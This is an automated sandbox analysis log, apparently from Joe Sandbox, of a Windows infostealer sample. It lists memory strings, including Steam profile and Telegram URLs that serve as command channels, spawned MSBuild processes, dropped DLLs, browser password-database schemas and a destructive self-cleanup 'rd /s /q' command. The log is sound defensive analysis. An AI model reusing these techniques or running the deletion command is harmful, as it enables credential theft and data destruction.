Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869f
Source: file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.ste
Source: 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/
Source: 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/about/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/news/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: DBKKFC.4.dr String found in binary or memory: https://support.mozilla.org
Source: DBKKFC.4.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DBKKFC.4.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/ae5ed
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: HCAEHD.4.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: HCAEHD.4.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/re
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: DBKKFC.4.dr String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: DBKKFC.4.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: DBKKFC.4.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: DBKKFC.4.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: DBKKFC.4.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:56263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.166.76:443 -> 192.168.2.8:56266 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 4_2_00411F55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040145B GetCurrentProcess,NtQueryInformationProcess, 4_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C8EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 4_2_6C8EB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C8EB8C0 rand_s,NtQueryVirtualMemory, 4_2_6C8EB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C8EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 4_2_6C8EB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C88F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 4_2_6C88F280
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6C8C94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6C8BCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CAB09D0 appears 99 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00617A20 appears 51 times
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: String function: 00AF7A20 appears 51 times
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: String function: 00B24BC8 appears 97 times
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: String function: 00B26AA8 appears 171 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308
Source: file.exe Static PE information: invalid certificate
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: .data ZLIB complexity 0.9919468068035944
Source: CBFCFBFBFB.exe.4.dr Static PE information: Section: .data ZLIB complexity 0.9911440122377623
Source: a43486128347[1].exe.4.dr Static PE information: Section: .data ZLIB complexity 0.9911440122377623
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/32@14/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C8E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 4_2_6C8E7030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 4_2_004114A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear, 4_2_00411807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199780418869[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3636
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess900
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp
Source: C:\ProgramData\CBFCFBFBFB.exe Command line argument: MZx 13_2_00AF20AD
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: BGDGHJ.4.dr, GCFBAK.4.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
